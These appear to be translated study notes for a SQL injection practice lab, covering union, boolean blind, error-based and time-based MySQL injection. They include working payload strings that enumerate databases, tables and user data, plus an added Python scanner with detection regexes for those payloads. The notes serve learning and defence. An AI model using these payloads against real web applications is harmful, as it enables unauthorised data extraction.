First hurdle
Union-based injection
1. Prepare
2. Add a ' to close the string and trigger an error
3. Use order by to determine the number of columns in the query
4. Same as above
5. Use a union select query to determine which field positions are echoed
6. Find the database name
7.1 Find the table names
7.2 Find the column names
8. Read the data
Second hurdle
The single quote does not need to be closed; the query uses an integer value
Otherwise the same as the first hurdle
Third hurdle
The parameter is wrapped in the ('') structure
Close it with ') instead
Fourth hurdle
The parameter is wrapped in the ("") structure
Close it with ") instead
Fifth hurdle
No matter what is entered, the page only shows "You are in ...."
There is no echo, so try blind injection
Boolean blind injection
Boolean blind injection methods are ----
left(1,2)=3 // take the leftmost 2 characters of the first argument and compare the result with 3
ascii(substr(1,2,3)) // substr(str,pos,len): take characters of the first argument starting at position 2, with the third argument as the length (1 in the examples below), then convert the result to its ascii code
regexp // regular-expression match of the target value against a pattern such as [a-z]; the result is 1 when it matches and 0 when it does not
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1)
like // used in the same way as regexp
ord() and mid()
(1) using left
1. Test
2. First test whether the first character of the database name is greater than b
Then test whether it is greater than y
So the first character lies between b and y; binary search can be used to narrow it down, or, without binary search, compare for equality one value at a time
Then test the second character, and so on
(2) use length() to get the length of the database name
(3) use ascii and substr
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>101 --+
This tests whether the first character of the first table name is greater than e (ascii 101), i.e. not e
For the second character use substr(x,2,1); the position argument 2 can be changed in the same way, and so on
To get the third table, change limit 0,1 to limit 2,1: the 2 is the starting offset (the third row, counting from 0) and the 1 is the number of rows taken
(4) regexp
Guess the columns of the users table
and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)
(5) using mid and ord
Obtain the contents of the users table
and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68
This takes the first character of the first row of the username column of the users table as an ascii value and compares it with 68
Error-based blind injection
Error-based blind injection types are ----
count, floor, group by
double value out of range
bigint overflow
xpath functions -- extractvalue and updatexml
data duplication
(1) floor function
union select 1,count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2))a from information_schema.columns group by a
(2) double value out of range
(Could not be reproduced successfully)
union select (exp(~(select*from(select user())x))),2,3
(3) bigint overflow
(Also could not be reproduced successfully)
union select(!(select * from(select user())x) - ~0),2,3
(4) xpath functions
and extractvalue(1,concat(0x7e,(select @@version),0x7e))
and updatexml(1,concat(0x7e,(select @@version),0x7e),1)
(5) data duplication
union select 1,2,3 from(select NAME_CONST(version(),1),NAME_CONST(version(),1))x
Time-based blind injection
Time-based blind injection types are ----
sleep() function
BENCHMARK() function
(1) sleep function
Wrong guess: 5 second delay
Correct guess: returns 1 with no delay
and If(ascii(substr(database(),1,1))=115,1,sleep(5))
(2) BENCHMARK function
Correct guess: delay
UNION SELECT(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM(select database() as current)as tb1
When the guess is correct, ENCODE('MSG','by 5 seconds') is executed 50 million times, which takes noticeable time and CPU resources
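Detection logic for the payload families in the boolean, error-based and time-based sections above, as an added example that is not part of the original notes: it decodes the request target from constructed web-server log lines and labels each hit with the injection family its signature matches. The SAMPLE_LOG lines, the function names and the signature regexes are my own assumptions, not anything taken from the page.

```python
import re
from urllib.parse import unquote_plus

# Signature families drawn from the payload patterns above; applied to the URL-decoded, lower-cased target.
SIGNATURES = {
    "union": re.compile(r"\bunion\b\s+(all\s+)?select\b"),
    "boolean_blind": re.compile(
        r"\b(and|or)\b\s*(\d+\s*=\s*\(|\b(ascii|ord)\s*\(\s*(substr|mid|left)\b|"
        r"\blength\s*\(|\bleft\s*\()"),
    "error_based": re.compile(
        r"\b(extractvalue|updatexml|name_const)\s*\(|\bfloor\s*\(\s*rand\b|"
        r"\bexp\s*\(\s*~|group\s+by\s+\w+\s*$|~0\b"),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "schema_probe": re.compile(r"information_schema\.(tables|columns|schemata)"),
}

def decode_query(raw: str) -> str:
    """Decode a request target into the text the SQL parser would see (two passes handle %2527-style double encoding)."""
    decoded = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(request_target: str) -> list[str]:
    """Return the sorted list of injection families whose signature matches the decoded request target."""
    text = decode_query(request_target)
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(text))

# Constructed sample access-log lines (not from a real system); the paths mirror the lab levels above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,database(),3--+ HTTP/1.1" 200 540
10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))%3E101--+ HTTP/1.1" 200 498
10.0.0.5 - - [10/Oct/2023:13:56:30 +0000] "GET /Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,version()))--+ HTTP/1.1" 500 301
10.0.0.5 - - [10/Oct/2023:13:57:10 +0000] "GET /Less-5/?id=1%27%20and%20if(1=1,1,sleep(5))--+ HTTP/1.1" 200 498
"""

LOG_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def scan_log(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, status, families) for every log line whose target matches at least one signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        families = classify(m.group("target"))
        if families:
            hits.append((m.group("ip"), m.group("status"), families))
    return hits
```

Running scan_log(SAMPLE_LOG) flags four of the five constructed lines; the plain id=1 request is left alone, and the status column shows the 500 that an error-based probe typically produces.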
Sixth hurdle
Handling of the id parameter: the ' is replaced by "
So far this basically covers the general types of injection